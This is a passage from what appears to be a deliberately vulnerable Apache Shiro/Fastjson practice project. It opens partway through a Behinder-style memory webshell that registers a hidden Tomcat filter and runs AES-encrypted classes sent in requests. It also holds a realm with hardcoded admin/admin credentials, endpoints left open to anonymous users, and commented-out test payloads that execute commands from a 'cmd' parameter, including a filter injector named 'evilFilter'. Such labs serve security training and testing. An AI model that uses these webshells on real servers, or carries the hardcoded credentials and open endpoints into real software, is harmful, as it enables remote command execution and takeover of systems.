120 |         ServletContext servletContext = this.request.getServletContext();
121 |         Filter filter = this;
122 |         String filterName = this.path;
123 |         String url = this.path;
124 |         if (servletContext.getFilterRegistration(filterName) == null) {
125 |             Field contextField = null;
126 |             ApplicationContext applicationContext = null;
127 |             StandardContext standardContext = null;
128 |             Field stateField = null;
129 |             FilterRegistration.Dynamic filterRegistration = null;
130 | 
131 |             String var11;
132 |             try {
133 |                 contextField = servletContext.getClass().getDeclaredField("context");
134 |                 contextField.setAccessible(true);
135 |                 applicationContext = (ApplicationContext)contextField.get(servletContext);
136 |                 contextField = applicationContext.getClass().getDeclaredField("context");
137 |                 contextField.setAccessible(true);
138 |                 standardContext = (StandardContext)contextField.get(applicationContext);
139 |                 stateField = LifecycleBase.class.getDeclaredField("state");
140 |                 stateField.setAccessible(true);
141 |                 stateField.set(standardContext, LifecycleState.STARTING_PREP);
142 |                 filterRegistration = servletContext.addFilter(filterName, filter);
143 |                 filterRegistration.addMappingForUrlPatterns(EnumSet.of(DispatcherType.REQUEST), false, new String[]{url});
144 |                 Method filterStartMethod = StandardContext.class.getMethod("filterStart");
145 |                 filterStartMethod.setAccessible(true);
146 |                 filterStartMethod.invoke(standardContext, (Object[])null);
147 |                 stateField.set(standardContext, LifecycleState.STARTED);
148 |                 var11 = null;
149 | 
150 |                 Class filterMap;
151 |                 try {
152 |                     filterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
153 |                 } catch (Exception var23) {
154 |                     filterMap = Class.forName("org.apache.catalina.deploy.FilterMap");
155 |                 }
156 | 
157 |                 Method findFilterMaps = standardContext.getClass().getMethod("findFilterMaps");
158 |                 Object[] filterMaps = (Object[])((Object[])findFilterMaps.invoke(standardContext));
159 |                 Object[] tmpFilterMaps = new Object[filterMaps.length];
160 |                 int index = 1;
161 | 
162 |                 for(int i = 0; i < filterMaps.length; ++i) {
163 |                     Object filterMapObj = filterMaps[i];
164 |                     findFilterMaps = filterMap.getMethod("getFilterName");
165 |                     String name = (String)findFilterMaps.invoke(filterMapObj);
166 |                     if (name.equalsIgnoreCase(filterName)) {
167 |                         tmpFilterMaps[0] = filterMapObj;
168 |                     } else {
169 |                         tmpFilterMaps[index++] = filterMaps[i];
170 |                     }
171 |                 }
172 | 
173 |                 System.arraycopy(tmpFilterMaps, 0, filterMaps, 0, filterMaps.length);
174 |                 String var27 = "Success";
175 |                 return var27;
176 |             } catch (Exception var24) {
177 |                 var11 = var24.getMessage();
178 |             } finally {
179 |                 stateField.set(standardContext, LifecycleState.STARTED);
180 |             }
181 | 
182 |             return var11;
183 |         } else {
184 |             return "Filter already exists";
185 |         }
186 |     }
187 | 
188 |     public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) throws IOException, ServletException {
189 |         HttpSession session = ((HttpServletRequest)req).getSession();
190 |         Map obj = new HashMap();
191 |         obj.put("request", req);
192 |         obj.put("response", resp);
193 |         obj.put("session", session);
194 | 
195 |         try {
196 |             session.putValue("u", this.Pwd);
197 |             Cipher c = Cipher.getInstance("AES");
198 |             String dd = req.getReader().readLine();
199 |             c.init(2, new SecretKeySpec(this.Pwd.getBytes(), "AES"));
200 |             (new MemBehinderFilter(this.getClass().getClassLoader())).g(c.doFinal(this.base64Decode(dd))).newInstance().equals(obj);
201 |         } catch (Exception var7) {
202 |             var7.printStackTrace();
203 |         }
204 | 
205 |     }
206 | 
207 |     public byte[] base64Decode(String str) throws Exception {
208 |         try {
209 |             Class clazz = Class.forName("sun.misc.BASE64Decoder");
210 |             return (byte[])((byte[])clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str));
211 |         } catch (Exception var5) {
212 |             Class clazz = Class.forName("java.util.Base64");
213 |             Object decoder = clazz.getMethod("getDecoder").invoke((Object)null);
214 |             return (byte[])((byte[])decoder.getClass().getMethod("decode", String.class).invoke(decoder, str));
215 |         }
216 |     }
217 | 
218 |     public void init(FilterConfig filterConfig) throws ServletException {
219 |     }
220 | 
221 |     public void destroy() {
222 |     }
223 | }
224 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/shiro/MainRealm.java:
--------------------------------------------------------------------------------
 1 | 
 2 | package com.shiro.vuln.shiro;
 3 | 
 4 | import org.apache.shiro.authc.*;
 5 | import org.apache.shiro.authz.AuthorizationInfo;
 6 | import org.apache.shiro.realm.AuthorizingRealm;
 7 | import org.apache.shiro.subject.PrincipalCollection;
 8 | 
 9 | public class MainRealm extends AuthorizingRealm {
10 |     // 用于授权
11 |     protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) {
12 |         // 获取当前授权的用户
13 |         return null;
14 |     }
15 | 
16 |     // 用于认证
17 |     protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException {
18 |         // getPrincipal 获取当前用户身份
19 |         String username = (String)authenticationToken.getPrincipal();
20 |         // 获取当前用户信用凭证 （其实就是获取密码 密码是 char类型的所以要转一下
21 |         String password = new String((char[])authenticationToken.getCredentials());
22 |         // 如果等于就返回对应的用户凭证
23 |         if (username.equals("admin") && password.equals("admin")) {
24 |             // shiro 会返回一个 AuthenticationInfo
25 |             // 当前的realm名字
26 |             return new SimpleAuthenticationInfo((Object)username, (Object)password, this.getName());
27 |         }
28 |         throw new IncorrectCredentialsException("Username or password is incorrect.");
29 |     }
30 | }
31 | 
32 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/shiro/ShiroConfig.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.shiro;
 2 | 
 3 | import java.util.LinkedHashMap;
 4 | import org.apache.shiro.mgt.RememberMeManager;
 5 | import org.apache.shiro.mgt.SecurityManager;
 6 | import org.apache.shiro.realm.Realm;
 7 | import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
 8 | import org.apache.shiro.web.mgt.CookieRememberMeManager;
 9 | import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
10 | import org.springframework.context.annotation.Bean;
11 | import org.springframework.context.annotation.Configuration;
12 | 
13 | @Configuration
14 | public class ShiroConfig {
15 | 
16 |     @Bean
17 |     MainRealm mainRealm() {
18 |         return new MainRealm();
19 |     }
20 | 
21 |     @Bean
22 |     RememberMeManager cookieRememberMeManager() {
23 |         return new CookieRememberMeManager();
24 |     }
25 | 
26 | 
27 |     @Bean
28 |     SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) {
29 |         DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
30 |         manager.setRealm((Realm)mainRealm);
31 |         manager.setRememberMeManager(cookieRememberMeManager);
32 |         return manager;
33 |     }
34 | 
35 |     @Bean(name={"shiroFilter"})
36 |     ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) {
37 |         ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
38 |         bean.setSecurityManager(securityManager);
39 |         bean.setLoginUrl("/login");
40 |         bean.setUnauthorizedUrl("/unauth");
41 |         LinkedHashMap<String, String> map = new LinkedHashMap<String, String>();
42 |         map.put("/doLogin", "anon");
43 |         map.put("/json", "anon");
44 |         map.put("/index", "anon");
45 |         map.put("/init", "anon");
46 |         map.put("/getKey", "anon");
47 |         map.put("/setKey", "anon");
48 |         map.put("/ser", "anon");
49 |         map.put("/**", "user");
50 |         bean.setFilterChainDefinitionMap(map);
51 |         return bean;
52 |     }
53 | }
54 | 
55 | 


--------------------------------------------------------------------------------
/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8088


--------------------------------------------------------------------------------
/src/test/java/TomcatEcho.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/safe6Sec/ShiroAndFastJson/df004c21bb3df98eeb3eeec177fdfafc7b12c9be/src/test/java/TomcatEcho.class


--------------------------------------------------------------------------------
/src/test/java/TomcatEcho.java:
--------------------------------------------------------------------------------
  1 | /*
  2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
  3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  4 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  5 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  6 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  7 | import org.apache.catalina.connector.Response;
  8 | import org.apache.coyote.Request;
  9 | import org.apache.coyote.RequestInfo;
 10 | 
 11 | import java.io.InputStream;
 12 | import java.io.Writer;
 13 | import java.lang.reflect.Field;
 14 | import java.util.List;
 15 | 
 16 | public class TomcatEcho extends AbstractTranslet {
 17 | 
 18 |     static {
 19 |         try {
 20 |             boolean flag = false;
 21 |             Thread[] threads = (Thread[]) getField(Thread.currentThread().getThreadGroup(),"threads");
 22 |             for (int i=0;i<threads.length;i++){
 23 |                 Thread thread = threads[i];
 24 |                 if (thread != null){
 25 |                     String threadName = thread.getName();
 26 |                     if (!threadName.contains("exec") && threadName.contains("http")){
 27 |                         Object target = getField(thread,"target");
 28 |                         Object global = null;
 29 |                         if (target instanceof Runnable){
 30 |                             // 需要遍历其中的 this$0/handler/global
 31 |                             // 需要进行异常捕获，因为存在找不到的情况
 32 |                             try {
 33 |                                 global = getField(getField(getField(target,"this$0"),"handler"),"global");
 34 |                             } catch (NoSuchFieldException fieldException){
 35 |                                 fieldException.printStackTrace();
 36 |                             }
 37 |                         }
 38 |                         // 如果成功找到了 我们的 global ，我们就从里面获取我们的 processors
 39 |                         if (global != null){
 40 |                             List processors = (List) getField(global,"processors");
 41 |                             for (i=0;i<processors.size();i++){
 42 |                                 RequestInfo requestInfo = (RequestInfo) processors.get(i);
 43 |                                 if (requestInfo != null){
 44 |                                     Request tempRequest = (Request) getField(requestInfo,"req");
 45 |                                     org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) tempRequest.getNote(1);
 46 |                                     Response response = request.getResponse();
 47 | 
 48 |                                     String cmd = null;
 49 |                                     if (request.getParameter("cmd") != null){
 50 |                                         cmd =  request.getParameter("cmd");
 51 |                                     }
 52 | 
 53 |                                     if (cmd != null){
 54 |                                         System.out.println(cmd);
 55 |                                         InputStream inputStream = new ProcessBuilder(cmd).start().getInputStream();
 56 |                                         StringBuilder sb = new StringBuilder("");
 57 |                                         byte[] bytes = new byte[1024];
 58 |                                         int n = 0 ;
 59 |                                         while ((n=inputStream.read(bytes)) != -1){
 60 |                                             sb.append(new String(bytes,0,n));
 61 |                                         }
 62 | 
 63 |                                         Writer writer = response.getWriter();
 64 |                                         writer.write(sb.toString());
 65 |                                         writer.flush();
 66 |                                         inputStream.close();
 67 |                                         System.out.println("success");
 68 |                                         flag = true;
 69 |                                         break;
 70 |                                     }
 71 | //                                    System.out.println("success");
 72 | //                                    flag = true;
 73 | //                                    break;
 74 |                                     if (flag){
 75 |                                         break;
 76 |                                     }
 77 |                                 }
 78 |                             }
 79 |                         }
 80 |                     }
 81 |                 }
 82 |                 if (flag){
 83 |                     break;
 84 |                 }
 85 |             }
 86 |         } catch (Exception e){
 87 |             e.printStackTrace();
 88 |         }
 89 | 
 90 |     }
 91 | 
 92 | 
 93 |     public static Object getField(Object obj, String fieldName) throws Exception {
 94 |         Field f0 = null;
 95 |         Class clas = obj.getClass();
 96 | 
 97 |         while (clas != Object.class){
 98 |             try {
 99 |                 f0 = clas.getDeclaredField(fieldName);
100 |                 break;
101 |             } catch (NoSuchFieldException e){
102 |                 clas = clas.getSuperclass();
103 |             }
104 |         }
105 | 
106 |         if (f0 != null){
107 |             f0.setAccessible(true);
108 |             return f0.get(obj);
109 |         }else {
110 |             throw new NoSuchFieldException(fieldName);
111 |         }
112 |     }
113 | 
114 |     @Override
115 |     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
116 | 
117 |     }
118 | 
119 |     @Override
120 |     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
121 | 
122 |     }
123 | }
124 | */
125 | 


--------------------------------------------------------------------------------
/src/test/java/TomcatHeaderSize.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/safe6Sec/ShiroAndFastJson/df004c21bb3df98eeb3eeec177fdfafc7b12c9be/src/test/java/TomcatHeaderSize.class


--------------------------------------------------------------------------------
/src/test/java/TomcatHeaderSize.java:
--------------------------------------------------------------------------------
 1 | /*
 2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
 3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
 4 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
 5 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
 6 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
 7 | 
 8 | @SuppressWarnings("all")
 9 | public class TomcatHeaderSize extends AbstractTranslet {
10 | 
11 |     static {
12 |         try {
13 |             java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
14 |             java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
15 |             java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
16 |             java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");
17 |             java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);
18 |             contextField.setAccessible(true);
19 |             headerSizeField.setAccessible(true);
20 |             serviceField.setAccessible(true);
21 |             requestField.setAccessible(true);
22 |             getHandlerMethod.setAccessible(true);
23 |             org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
24 |                     (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
25 |             org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
26 |             org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
27 |             org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
28 |             for (int i = 0; i < connectors.length; i++) {
29 |                 if (4 == connectors[i].getScheme().length()) {
30 |                     org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
31 |                     if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
32 |                         Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
33 |                         for (int j = 0; j < classes.length; j++) {
34 |                             // org.apache.coyote.AbstractProtocol$ConnectionHandler
35 |                             if (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {
36 |                                 java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
37 |                                 java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
38 |                                 globalField.setAccessible(true);
39 |                                 processorsField.setAccessible(true);
40 |                                 org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));
41 |                                 java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
42 |                                 for (int k = 0; k < list.size(); k++) {
43 |                                     org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
44 |                                     headerSizeField.set(tempRequest.getInputBuffer(),10000);
45 |                                 }
46 |                             }
47 |                         }
48 |                         ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(10000);
49 |                     }
50 |                 }
51 |             }
52 |         } catch (Exception e) {
53 |         }
54 |     }
55 | 
56 |     @Override
57 |     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
58 | 
59 |     }
60 | 
61 |     @Override
62 |     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
63 | 
64 |     }
65 | }
66 | */
67 | 


--------------------------------------------------------------------------------
/src/test/java/TomcatMemShellInject.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/safe6Sec/ShiroAndFastJson/df004c21bb3df98eeb3eeec177fdfafc7b12c9be/src/test/java/TomcatMemShellInject.class


--------------------------------------------------------------------------------
/src/test/java/TomcatMemShellInject.java:
--------------------------------------------------------------------------------
  1 | /*
  2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
  3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  4 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  5 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  6 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  7 | import org.apache.catalina.core.StandardContext;
  8 | 
  9 | import javax.servlet.*;
 10 | import javax.servlet.http.HttpServletRequest;
 11 | import java.io.IOException;
 12 | import java.lang.reflect.Field;
 13 | import java.lang.reflect.Method;
 14 | import java.util.Map;
 15 | 
 16 | public class TomcatMemShellInject extends AbstractTranslet implements Filter {
 17 | 
 18 |     private final String cmdParamName = "cmd";
 19 |     private final static String filterUrlPattern = "/*";
 20 |     private final static String filterName = "evilFilter";
 21 | 
 22 |     static {
 23 |         try {
 24 | 
 25 |             Class c = Class.forName("org.apache.catalina.core.StandardContext");
 26 | 
 27 |             org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
 28 |                     (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
 29 |             StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
 30 | 
 31 |             ServletContext servletContext = standardContext.getServletContext();
 32 | 
 33 |             Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
 34 |             Configs.setAccessible(true);
 35 |             Map filterConfigs = (Map) Configs.get(standardContext);
 36 |             // 如果我们filter的名字不存在那么就进行注入
 37 |             if (filterConfigs.get(filterName) == null){
 38 |                 // 将自己作为 Filter 进行注入
 39 | 
 40 |                 Field stateField = org.apache.catalina.util.LifecycleBase.class
 41 |                         .getDeclaredField("state");
 42 |                 stateField.setAccessible(true);
 43 |                 stateField.set(standardContext, org.apache.catalina.LifecycleState.STARTING_PREP);
 44 |                 // 添加恶意 filter
 45 |                 Filter MemShell = new TomcatMemShellInject();
 46 | 
 47 |                 FilterRegistration.Dynamic filterRegistration = servletContext
 48 |                         .addFilter(filterName, MemShell);
 49 |                 filterRegistration.setInitParameter("encoding", "utf-8");
 50 |                 filterRegistration.setAsyncSupported(false);
 51 |                 filterRegistration
 52 |                         .addMappingForUrlPatterns(java.util.EnumSet.of(DispatcherType.REQUEST), false,
 53 |                                 new String[]{filterUrlPattern});
 54 | 
 55 |                 if (stateField != null) {
 56 |                     stateField.set(standardContext, org.apache.catalina.LifecycleState.STARTED);
 57 |                 }
 58 | 
 59 |                 if (standardContext != null){
 60 |                     Method filterStartMethod = StandardContext.class
 61 |                             .getMethod("filterStart");
 62 |                     filterStartMethod.setAccessible(true);
 63 |                     filterStartMethod.invoke(standardContext, null);
 64 | 
 65 |                     Class ccc = null;
 66 |                     try {
 67 |                         ccc = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
 68 |                     } catch (Throwable t){}
 69 |                     if (ccc == null) {
 70 |                         try {
 71 |                             ccc = Class.forName("org.apache.catalina.deploy.FilterMap");
 72 |                         } catch (Throwable t){}
 73 |                     }
 74 | 
 75 | 
 76 |                     Method m = c.getMethod("findFilterMaps");
 77 |                     Object[] filterMaps = (Object[]) m.invoke(standardContext);
 78 |                     Object[] tmpFilterMaps = new Object[filterMaps.length];
 79 |                     int index = 1;
 80 |                     for (int i = 0; i < filterMaps.length; i++) {
 81 |                         Object o = filterMaps[i];
 82 |                         m = ccc.getMethod("getFilterName");
 83 |                         String name = (String) m.invoke(o);
 84 |                         if (name.equalsIgnoreCase(filterName)) {
 85 |                             tmpFilterMaps[0] = o;
 86 |                         } else {
 87 |                             tmpFilterMaps[index++] = filterMaps[i];
 88 |                         }
 89 |                     }
 90 |                     for (int i = 0; i < filterMaps.length; i++) {
 91 |                         filterMaps[i] = tmpFilterMaps[i];
 92 |                     }
 93 | 
 94 |                 }
 95 |             }
 96 | 
 97 |         } catch (Exception e){
 98 |             e.printStackTrace();
 99 |         }
100 |     }
101 | 
102 | 
103 |     @Override
104 |     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
105 | 
106 |     }
107 | 
108 |     @Override
109 |     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
110 | 
111 |     }
112 | 
113 |     @Override
114 |     public void init(FilterConfig filterConfig) throws ServletException {
115 | 
116 |     }
117 | 
118 |     @Override
119 |     public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
120 |         HttpServletRequest req = (HttpServletRequest) servletRequest;
121 |         System.out.println("Do Filter ......");
122 |         String cmd;
123 |         if ((cmd = servletRequest.getParameter(cmdParamName)) != null) {
124 |             Process process = Runtime.getRuntime().exec(cmd);
125 |             java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
126 |                     new java.io.InputStreamReader(process.getInputStream()));
127 |             StringBuilder stringBuilder = new StringBuilder();
128 |             String line;
129 |             while ((line = bufferedReader.readLine()) != null) {
130 |                 stringBuilder.append(line + '\n');
131 |             }
132 |             servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
133 |             servletResponse.getOutputStream().flush();
134 |             servletResponse.getOutputStream().close();
135 |             return;
136 |         }
137 |         filterChain.doFilter(servletRequest, servletResponse);
138 |     }
139 | 
140 |     @Override
141 |     public void destroy() {
142 | 
143 |     }
144 | }
145 | */
146 | 


--------------------------------------------------------------------------------